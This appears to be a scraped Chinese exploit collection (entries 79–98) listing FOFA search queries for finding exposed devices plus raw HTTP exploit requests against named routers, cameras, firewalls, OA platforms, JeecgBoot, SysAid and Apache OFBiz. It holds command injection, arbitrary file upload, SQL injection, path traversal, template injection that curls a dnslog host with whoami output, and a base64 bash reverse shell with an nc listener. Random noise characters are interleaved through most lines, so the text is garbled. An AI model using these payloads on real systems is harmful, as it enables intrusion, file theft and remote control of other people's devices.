( e4 a0 `8 F: L! Y3 c" [0 E7 fHost: x.x.x.x
: d$ A r5 B0 s) @5 R6 W3 t; y* n: F6 C w" C) R. U4 ^
' F# F3 U/ k8 g# C9 S
79. BYTEVALUE 百为流控路由器远程命令执行
. p4 {6 s0 i/ j" n, M# G, y& P( J2 o* rFOFA:BYTEVALUE 智能流控路由器3 q+ N2 [- J; e. _
GET /goform/webRead/open/?path=|id HTTP/1.1
; f; i! M: A, E1 l. x' IHost:IP
/ g+ l+ u7 ~, m0 C# h* uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
) t/ v2 q$ m& k- oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" j- N7 }6 {5 \ [( |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; |0 K1 H" b7 {" a; w/ Z
Accept-Encoding: gzip, deflate
O" g z( e! N. {7 M' Y1 `0 jConnection: close
, O' T' s! A! ?Upgrade-Insecure-Requests: 19 j# n+ N& t* h/ Q4 J+ }4 w( F
# Y$ W6 R3 |" ~( X/ s0 n- a& `, K
9 I. F t) y/ o$ C
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
! T) D( L, ?; {) E) F) T( X9 P9 nFOFA:app="速达软件-公司产品"1 T3 B" L' |8 O% C3 f4 `- l& y
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1: q7 {5 r1 F. a0 [9 {; T- ?( W
Host: x.x.x.x% o/ a9 J; a- F) Q5 [# w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% i2 P- X) H* ^. \5 jContent-Length: 27
" z/ D- i, j; M, C2 O9 l) hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ b+ D) U/ \6 U% K5 ~1 G
Accept-Encoding: gzip, deflate
4 H% Z0 O3 S+ g9 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ D+ U# Z4 k6 w8 t% Y% yConnection: close% \8 a1 }/ q/ l$ G; j, \- g
Content-Type: application/octet-stream
. F5 y2 L' u" ~( l9 J7 DUpgrade-Insecure-Requests: 1
' s1 e$ K% h+ Q# @7 A0 w, A( ^* J6 U1 b+ j1 L: A
<% out.print("oessqeonylzaf");%>
+ H' P1 a+ }4 W; L6 o9 X' i* V" y# I1 \, Y6 \
" _6 c6 n" j" [0 L- N" W
GET /xykqmfxpoas.jsp HTTP/1.19 j# j" s( B& `
Host: x.x.x.x+ g O% `& Q& w. P5 P9 w4 }& f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 y* t$ B: O/ }5 n
Connection: close
" S+ R- t" p2 gAccept-Encoding: gzip
& W! Q$ [# `: {( P- V; a# v" k; q+ Q' Y1 y# |
' Z/ e4 @0 E6 A! ?81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露& L, B8 j/ }) ~
FOFA:app="uniview-视频监控"
) C2 S5 t& A- X6 SGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1; e; J. e% {3 \- G! N
Host: x.x.x.x3 G% P4 U. y( b C7 A' h7 F( ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, V" j* P1 t: Q* U i+ F
Connection: close5 Z2 U- ~7 q2 r Q
Accept-Encoding: gzip
, Y4 A4 F/ q% i* a. x: E9 F S7 ~2 Q1 e3 i- F+ b/ C5 H& i2 _
! {! ^8 i, T; T5 c9 W+ q6 e& G82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行" x5 E$ o4 ]. U, T3 U. u1 y; `
FOFA:app="思福迪-LOGBASE"
8 ]& C( S7 o" f0 e8 E5 E* |$ L" nPOST /bhost/test_qrcode_b HTTP/1.1: b- |* r$ `( @( V9 I1 H/ F
Host: BaseURL
- \ d! K6 q5 r+ VUser-Agent: Go-http-client/1.1
" \; D: _' h" `; fContent-Length: 23
! N0 R3 C7 d2 _6 U y4 T5 i: [8 [0 VAccept-Encoding: gzip8 @. ^2 F& I. ]8 I3 S' Y, h% `
Connection: close
% y7 {- G0 @- m/ Z6 W. }Content-Type: application/x-www-form-urlencoded @- V' T8 L" x$ Y( R! c* V
Referer: BaseURL
8 ~( I" n: v( a& o3 n: v) x8 Z7 [) b. h! f$ V9 ]3 E
z1=1&z2="|id;"&z3=bhost! H* t! b% |3 T6 ~4 n8 M
" Z! v" r6 ~6 E" J; X' n/ P4 k; K- C! f9 h2 N2 \; w: A
83. JeecgBoot testConnection 远程命令执行9 x- ]& S+ \, N
FOFA:title=="JeecgBoot 企业级低代码平台"
( |7 q$ ~$ v8 d8 q* |- t
- Z/ m3 H/ I# v% \2 H0 ?$ ~2 C \# [5 Q* k C
POST /jmreport/testConnection HTTP/1.1$ C; `& ]& \6 n+ E% ]) q+ N
Host: x.x.x.x, Y: h1 R! ^0 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ `0 C! Q9 Y' E" \Connection: close! T1 T' G6 e; \1 x2 w
Content-Length: 8881
' Q" y+ Y' {' Q! }' n9 {Accept-Encoding: gzip# a& i" u$ T. G# D& m' D2 S
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"4 r- |! X9 i4 X ~/ Z
Content-Type: application/json
1 l) v1 i4 `' g: C
3 |7 G g4 s. P1 l. i& ^PAYLOAD
' k# [$ a% i5 D- c
( d& \1 ?. ]- r% b" \84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
5 \6 J2 b% G( Q, a' dFOFA:title=="JeecgBoot 企业级低代码平台"
?/ u& @; |" D
! J. J* O& o/ r3 m2 m2 c% S2 P- F" y+ f# d9 W5 v! W. ]4 h9 g
) O5 o" {/ t2 y) _: }: L+ G
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.11 k1 b/ M+ |6 N3 h# Z3 _" w
Host: 192.168.40.130:80805 v( B( J% @7 _8 s6 j
User-Agent: curl/7.88.1
# z, S9 {) ?5 y$ l+ bContent-Length: 1568 y, ?2 I! e) D( v g
Accept: */*
! R. s, T6 G$ _! C2 {Connection: close
8 O: z0 ?2 m3 Y' ]Content-Type: application/json
$ ]8 ?' u3 T/ ]$ K6 k9 N! QAccept-Encoding: gzip3 j0 ^% Y# n B$ F! b% ?
z2 o! T q( O{
0 G6 S! K5 Q. e "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",0 o7 I5 Q5 d, C+ w: i
"type": "0"# J# V* W( s4 N* v+ g! V" H$ X
}% Z2 Z' d) r, Y0 f0 Z' ~8 j3 o! J, `
: N* ^' a, O9 s. u, G @7 `6 p& Q6 A- i3 F3 E1 P
85. SysAid On-premise< 23.3.36远程代码执行
$ G: D. f6 D. L9 d SCVE-2023-47246
+ y V. Q" |1 O w0 `$ d) ]8 VFOFA:body="sysaid-logo-dark-green.png" 0 g- X q# I& J6 J! H: j: T, N+ f
EXP数据包如下,注入哥斯拉马
d) X2 p) D/ l3 `5 G) ] J5 Y' z- zPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1: Q! C E" E7 P5 E9 H2 M
Host: x.x.x.x# Z! z6 E! i' l1 q8 h+ ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 }: a; w L2 x4 y$ M+ TContent-Type: application/octet-stream& H" C$ j4 J: p+ q% N
Accept-Encoding: gzip& ]9 ~+ { e q; ^1 ~% }$ u# w
, h) h- p4 S$ }. n: R ?% J- I
PAYLOAD
1 Q$ A5 M$ z1 V+ h. k; I/ i
# Q; w2 e) R+ V回显URL:http://x.x.x.x/userfiles/index.jsp/ h0 X1 f( n% ]' M. U
5 F# U. m' k- n$ S! H
86. 日本tosei自助洗衣机RCE
( K- S* c) Z( N- ~6 s- R/ fFOFA:body="tosei_login_check.php"
& Y* q: ?( i' g0 v8 V4 }" O/ h$ E* sPOST /cgi-bin/network_test.php HTTP/1.1
$ H) s; D2 x- ~$ P; T. h% H: p F0 nHost: x.x.x.x
8 N6 H% P! g8 m QUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.361 R/ u4 g. D1 G' N
Connection: close
6 d& ?8 F" @9 v7 [Content-Length: 44
( O& m8 E7 I" xAccept: */*
( z; f1 `3 @# z" ]8 JAccept-Encoding: gzip
* X- c* Y8 B9 t3 `Accept-Language: en
- s* w* `4 `& g/ l' v: aContent-Type: application/x-www-form-urlencoded
8 g0 q* s+ Z& k: \. O' B: Q0 ?
host=%0acat${IFS}/etc/passwd%0a&command=ping" H, P+ r7 J, V1 `5 H! l" P. H
% p [$ f3 r0 G: e
. I/ @! C8 z: o1 g% |# S87. 安恒明御安全网关aaa_local_web_preview文件上传
! \9 t* n {5 R1 ~: EFOFA:title="明御安全网关"! W9 a' r/ |. `1 P: H& _" Q& v
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
% r/ P& s8 s* q3 a; g; Q6 j# }Host: X.X.X.X: h& h" S s7 ~# x. g* ~% A9 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" w' {( w9 Z$ N9 ^Connection: close6 Q2 G# C8 R7 I0 s- e
Content-Length: 1982 u" C3 C; \, @
Accept-Encoding: gzip
! H" x! i' _6 T' v6 K* wContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd# Y# ]+ b7 f2 `- v
* M" ?% t, L2 ]4 t' v. }--qqobiandqgawlxodfiisporjwravxtvd
' y8 y0 o' k/ m4 o* j2 t. HContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
) l7 a5 e' Q3 s9 aContent-Type: text/plain' W& `* h+ d, l- T7 R& v) @$ \' r
- o+ y- [+ x' n2 g. `) K4 Y4 G2ZqGNnsjzzU2GBBPyd8AIA7QlDq
& G, i( X% ^1 C2 f--qqobiandqgawlxodfiisporjwravxtvd--) l, b6 Z& a- E5 ]9 G7 Q2 H
" N! v; u; ?4 ]# V6 [$ F. G P! u' t/ ?3 K" c
/jfhatuwe.php1 H/ ^0 [4 W3 ~) F' H0 p0 ~0 `
9 Z% u6 Z% o) M" S# X* h+ W! z) p88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行1 B; R3 a7 ^8 j+ O; I
FOFA:title="明御安全网关"0 f; P- Q" v! t# h6 u; O6 R2 @) p
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
6 O% f R6 C+ e7 J$ ^0 [& H$ BHost: x.x.x.xx.x.x.x+ Y1 N1 d8 j8 [9 a* _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: C/ y( m$ l! n0 v( GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 m- }& }. b+ M8 f* \Accept-Encoding: gzip, deflate
- H' j; p, p8 b3 ^; _5 |/ kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 Y9 |) j! F4 M f8 S6 M
Connection: close) K2 H ^4 T. Y' P
" S9 s5 Z6 |2 [5 O" {" p: c9 B$ ^) L: ~$ U4 `+ s8 ?6 R1 k% \0 r) ?
/astdfkhl.php: k& Q2 P7 j6 |) i2 w
( z) @* y( @! J+ \* ^" l89. 致远互联FE协作办公平台editflow_manager存在sql注入" d2 h# X0 B* B4 Q' h1 G9 Y5 u) y
FOFA:title="FE协作办公平台" || body="li_plugins_download"2 @- ~$ y# H# B! U7 _5 {( R
POST /sysform/003/editflow_manager.js%70 HTTP/1.1$ L: P/ q/ _2 ^6 d$ k& f# J
Host: x.x.x.x
) X0 ^. S; j g% Q8 F+ @8 }4 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- o ~2 j1 F" b. @5 @
Connection: close0 b7 I- k5 d8 i% O
Content-Length: 416 J* J, l5 e5 E2 [$ @" {
Content-Type: application/x-www-form-urlencoded
$ L) @2 h9 }& C/ FAccept-Encoding: gzip v+ \" R8 }2 V; g2 `) L
% m. I: R T1 ^% X, }; Toption=2&GUID=-1'+union+select+111*222--+9 G# _' e) d9 k
7 n, E5 O; [* o( v- k2 x6 i
9 T! T; C( e* L4 f9 Y' G
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
- N) M$ r& `0 b9 V) kFOFA:icon_hash="-1830859634"
# c+ }: O- f) y, IPOST /php/ping.php HTTP/1.1
: u1 e! T y* M& F* nHost: x.x.x.x
, S- x% ^2 z! I, g$ T o- o5 y- JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0+ F# |3 |% {% J/ i, w g. X
Content-Length: 51
) X; H6 ~% [& b- KAccept: application/json, text/javascript, */*; q=0.01
0 _+ B+ J- b/ g# N' BAccept-Encoding: gzip, deflate2 k$ d1 p2 ^. ]1 N. ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; ?! e& C* I- {: n7 EConnection: close
! ]( q" W4 j- L- h1 r/ B# k5 `Content-Type: application/x-www-form-urlencoded
9 R8 [3 {- U. \# H1 SX-Requested-With: XMLHttpRequest0 [) m5 A0 ?+ {# o5 V
( I, H( |8 ~" m8 Hjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig5 W; g/ E, X0 j; ~
& G8 h* S$ g5 w
: t& g$ z) V7 M( E" U) R
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
% P7 a1 N% J. k. `9 lFOFA:title="综合安防管理平台"
& Y& s0 u ^9 f4 Q1 vGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
9 r! n4 D) h2 g9 P( w2 @7 @Host: your-ip, m1 q0 h5 E% Q3 R, ]. ]) n6 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
( P+ _0 s5 r H8 ~ \' H, {Accept-Encoding: gzip, deflate
8 l8 H" s- q7 d# r W2 bAccept: */*: ?6 U: W2 ?0 X* A: s& {2 x
Connection: keep-alive
$ Z/ U9 H, @( Y% n$ V
" m# f, G/ p; b P) s: P) U' {" a( r# V' C9 A1 n5 d
% e0 n$ W9 q- y# L- w8 {92. 海康威视运行管理中心session命令执行6 m: [$ O/ [9 ~- f, n6 D7 k
Fastjson命令执行
) G4 A0 H# ]0 J+ U9 _hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
g8 m% _' ?: U' KPOST /center/api/session HTTP/1.1
; b% o0 W' k0 L% l5 DHost:
4 D" [, A( t7 B i, ~. KAccept: application/json, text/plain, */*
: m3 [' A6 r5 a5 S! ]9 @Accept-Encoding: gzip, deflate
' t o% A$ E* m& L/ j. ], vX-Requested-With: XMLHttpRequest7 t2 P. |( d8 {5 i0 y. o
Content-Type: application/json;charset=UTF-8
: w ]8 N# N/ hX-Language-Type: zh_CN
; E8 L5 ^! L$ OTestcmd: echo test
* p0 S+ G( O& H& ?/ [* z* E/ k5 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
" t" S4 C x" q3 {8 vAccept-Language: zh-CN,zh;q=0.9 j4 |/ g& p! x! k4 q3 Z) h- F
Content-Length: 5778, v& e( h4 \0 }' W. Q' C
4 ]8 r+ H# n% t0 F- yPAYLOAD$ Y4 V' N# {) y
. L- O$ O% S9 h- f* G, G( d3 p
: U3 m2 r" ~: u& X93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传9 d8 \( X4 {5 I5 N' ^( T3 A4 i
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
# n. ~! S6 ?% J8 iPOST /?g=app_av_import_save HTTP/1.1
' ~( u" Q" b' |% v% ZHost: x.x.x.x
1 b. p" z, p$ z" i8 }Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
* }' ^8 E J$ ^3 a9 HUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! u% r# k+ t; f; c- Z/ m
9 y& u3 p0 n& h# j# { v------WebKitFormBoundarykcbkgdfx
& N' e- X6 t$ J6 UContent-Disposition: form-data; name="MAX_FILE_SIZE"7 Z2 r( N( A* Z, T9 T
" G, m7 o# P# [! H' M( m" k
10000000' ?+ J* P! o" D
------WebKitFormBoundarykcbkgdfx% y* ^- N9 V+ A* m7 }3 r; ~1 s
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
! I7 P2 P7 @/ u1 x* U8 W' ~5 _+ [: aContent-Type: text/plain
) E3 l/ l3 k$ N( J; s7 o
6 m5 K+ g# f6 n) _wagletqrkwrddkthtulxsqrphulnknxa
2 x- Y& z( @! x! V: a------WebKitFormBoundarykcbkgdfx) O1 U8 N8 l% ?1 E8 l/ |
Content-Disposition: form-data; name="submit_post"
! [) c# w( M7 g$ m+ q/ _2 r: A1 a+ W+ ~% f# p
obj_app_upfile$ h) {( l' K: ^3 O. t( X
------WebKitFormBoundarykcbkgdfx
; ?9 Q4 t7 ]8 b7 ?( vContent-Disposition: form-data; name="__hash__"
, U# D5 L1 }- ?. ?- b4 T. ]: o; a3 c8 Q, N2 l' F
0b9d6b1ab7479ab69d9f71b05e0e9445
* g s2 W, P1 q5 a------WebKitFormBoundarykcbkgdfx--' a3 ]) O4 M7 c5 w
- N; H; b9 f. A7 K
. H c4 t& S9 `+ d* m( ?4 Z
GET /attachements/xlskxknxa.txt HTTP/1.13 |& E( J0 G6 m$ ?' V: i- i
Host: xx.xx.xx.xx9 V* O7 P0 A H1 r- Q+ T0 J! x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ v I- b' p/ a% Z+ ]# x
! |, p( V) A/ h; F. R+ D' h
8 P! Z+ ?2 n, S$ {; e1 T94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
2 L' Y* ?2 f5 O' u" B! U, AFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
# }7 {# V! s: FPOST /?g=obj_area_import_save HTTP/1.1
; Z9 A! Q. B" ?. x, b' A* a4 \, @* PHost: x.x.x.x
4 d) k! q( [6 a6 HContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
& p" T8 K8 s3 `* ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 A1 ?( J% l) p' K' @4 y/ \) u
% s J/ i; }) o' D) T/ S$ T. r+ Q
------WebKitFormBoundarybqvzqvmt
1 q$ m$ d3 | v! ?! w( a! B9 Y3 mContent-Disposition: form-data; name="MAX_FILE_SIZE"
! I/ l' \1 ]$ L+ b1 x
" Y. u6 l& W. P1 Q! }, A10000000. Q0 n8 i) l- h
------WebKitFormBoundarybqvzqvmt
0 T6 M9 j3 x _. x" C) |Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
~9 s- X; y& j" p& R& MContent-Type: text/plain5 ?) K" \& H- r. s. `* x
; k( p6 v; w: T$ apxplitttsrjnyoafavcajwkvhxindhmu
" V) l& A9 M/ b2 ^3 j) ^------WebKitFormBoundarybqvzqvmt$ R* \' j; M8 ^# o, a$ G
Content-Disposition: form-data; name="submit_post"
m q, e# z! E% m
2 s- b1 t6 p' r& l6 \- Jobj_app_upfile
- S% {# s$ U3 Q. W------WebKitFormBoundarybqvzqvmt
; A. r* C, [) B, C" c8 s9 sContent-Disposition: form-data; name="__hash__"6 m) J- ` ]/ M- v$ ?: X% e
/ x" ]- Q7 Y0 {+ {0 E. o
0b9d6b1ab7479ab69d9f71b05e0e9445+ y# A1 i; o3 Y/ p$ t4 D9 }3 D& V- J
------WebKitFormBoundarybqvzqvmt--; E- Z7 W$ D( Z6 T
- n* @% V4 S* w2 a# b: t M
; M) L$ W' M9 u: o
5 R7 A T d( B n* Y& s) z P
GET /attachements/xlskxknxa.txt HTTP/1.1
0 P7 C) @+ w5 |) tHost: xx.xx.xx.xx m! l6 j# v7 E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ S* \, n, B, U& M
& ]/ s* V) x1 S4 i0 i- d7 R Q3 i( ?/ @2 }
1 m( v5 g; S- L, B; O
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
1 g/ a+ t( l/ \( Z1 E6 WCVE-2023-49070
2 h4 v/ S5 R% [- ]FOFA:app="Apache_OFBiz"1 K: f# `7 C! u5 O
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1' u3 `5 d8 r' G: H% Q
Host: x.x.x.x( Q+ V; Q" s5 C9 D/ e- P! U6 R; \
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36, x& t4 d' R F9 [, }/ l' C4 {
Connection: close* T8 T+ G3 W" ~% B% J( v
Content-Length: 8897 s: J( z! j0 r: y4 a- D- k
Content-Type: application/xml& B$ w6 T/ L+ ^# O* Q+ p! K
Accept-Encoding: gzip
: g' f" I+ W E: s6 M8 T1 N: ] H/ m( I3 Z2 }- C/ L4 u7 ^
<?xml version="1.0"?>
+ s3 c* K# e+ y7 ?. I5 c, ~+ o2 I<methodCall>/ ~8 w7 `& c& y+ i5 u. O
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
) w) F* T; Q) F- j1 z' s; Z( z3 X <params>
- c. h. Z7 [9 A- | <param>
7 D. f( D% G1 l, p) R" s9 p <value>( G! ^' M- r9 T% w4 b) {
<struct>
5 h6 ^0 A" y* S; \ <member>
) J, w0 \9 E( Z <name>test</name>6 |- j) D) M& W0 ]5 }/ a* I6 C
<value>
- C' R7 g! @# @# M2 V <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>2 a! E; R8 o/ i: G9 Y+ S( _
</value>7 G/ a" d3 ~2 |1 [- @4 {' F
</member>/ j/ V8 a- e4 @7 r8 @" p: N' R
</struct>
D3 |3 P3 o# m. Q) J$ Q </value>
: a, E! \$ h2 N </param>9 T$ Q6 |$ ?5 X/ k; S0 n+ F# g
</params>
4 n( [: x' T' m& ?+ x# n, t0 \</methodCall> C/ v, |! N5 b M7 r+ G
( X' J# w$ G3 w3 N# F) l7 ^
4 @, E4 k. Q2 ?6 x+ S7 p, h
用ysoserial生成payload' _" z& I# k. R3 c, O
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"6 H- g/ m' B4 i7 Q" z2 `% d
( ]8 l, l5 f% x! |+ g9 c' r! J
5 \* e% K& @ F: F* Y将生成的payload替换到上面的POC
' r9 e. l- k3 V/ uPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.11 e) {* ]# s9 q, `( T- E
Host: 192.168.40.130:8443! E+ D/ h( a5 Z9 M L8 y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.369 c' h. x) K4 D. g3 A! m
Connection: close9 ?5 P: D& U) ?7 L
Content-Length: 889 n+ F i: U$ G2 l) p& j! @
Content-Type: application/xml5 k+ z7 P- r* N# ^: u. x
Accept-Encoding: gzip& B) \2 D: r& I3 |6 ?$ f) N
! Y- K) Z9 U+ ^PAYLOAD
- A+ i. C' `+ z/ G/ _- {9 Z r) |% U9 B
96. Apache OFBiz 18.12.11 groovy 远程代码执行; \. F/ B/ @! r8 g4 L& K- o
FOFA:app="Apache_OFBiz"
4 M2 e6 m4 F8 v( K* p( `POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.18 G& m; M4 b# `! j
Host: localhost:84437 ]( v9 F9 w+ u- A+ Z+ |( [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 t) {2 l, l4 i4 W
Accept: */*
& m% K( k" z+ n. l/ s w- v8 c8 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# ]+ \6 V8 k; ~
Content-Type: application/x-www-form-urlencoded
" w1 m0 Y7 p- e# `! OContent-Length: 55( K4 K( }6 t! t
8 h4 j. }0 I) n1 U1 i! ~groovyProgram=throw+new+Exception('id'.execute().text);% J! Z" @, L0 [( g; @
- q% q6 L! z% ]
* x) y3 f, L. |' i
反弹shell
4 B9 g/ t, Q' c2 c' W1 w+ ~在kali上启动一个监听* x3 j3 `; ?! f8 `& _1 ~
nc -lvp 7777- Q1 D; z0 f) V# `9 _: s; J
" \* }4 A( F# g# J4 y& FPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
* Y0 {4 i0 @" X0 P( Q* WHost: 192.168.40.130:8443
. e, k W# s; p- A/ }" NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0* n ?# P U( K& q6 Z
Accept: */*
; Q' u$ z. U2 l- _8 J% PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 ^# L) P/ i+ a/ w
Content-Type: application/x-www-form-urlencoded4 O$ W0 K% N4 b2 N/ f
Content-Length: 71
7 Z& ~$ ]0 D3 t8 [4 a
0 e1 a3 S. J9 r& I: |- F* MgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
! c$ _/ F9 n& A2 {6 U1 q: T/ e+ y% G4 i. `; }: ~ U
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
& t1 l1 T4 K9 ?: \/ d7 E7 LFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
3 a1 c1 @, r6 S3 WGET /passport/login/ HTTP/1.1
5 x9 T/ w& ]6 E* J) v8 A/ kHost: 192.168.40.130:8085
% g! q' ?. c( ^! S7 ]9 I% N) yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 a% ~2 {% c! G9 F9 B- VAccept-Encoding: gzip
q& o i6 W* }8 k8 mConnection: close$ C: a0 I5 y" f% ^ X" s6 n$ I! a
Cookie: rememberMe=PAYLOAD
) V6 J' O& j! o" K9 k mX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
/ E+ }8 I: A. ?* U% {- m
! K8 y- w- P* Q' E& N4 ^1 y
2 }+ y9 _3 h) s; D, B" P98. SpiderFlow爬虫平台远程命令执行. r' X1 H5 Z( b& @: P! G- S
CVE-2024-0195* T- _; J. g- y k6 k p
FOFA:app="SpiderFlow"
' p3 B; a7 K( g8 Y) D" }POST /function/save HTTP/1.1
9 f' F- J. l5 N E# C- C7 i/ }Host: 192.168.40.130:8088
3 @, B' N: U+ Q/ ?3 a! ]' `" KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" Q- U7 E- f* O- ~0 G* [+ U
Connection: close2 S" j# X( d) b$ S
Content-Length: 121
9 n$ w0 F9 {4 W1 Y* S. QAccept: */*
" G5 l1 ]; Z1 N% i' f3 E9 uAccept-Encoding: gzip, deflate
8 \7 {! N8 |2 L6 a) m4 e4 ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
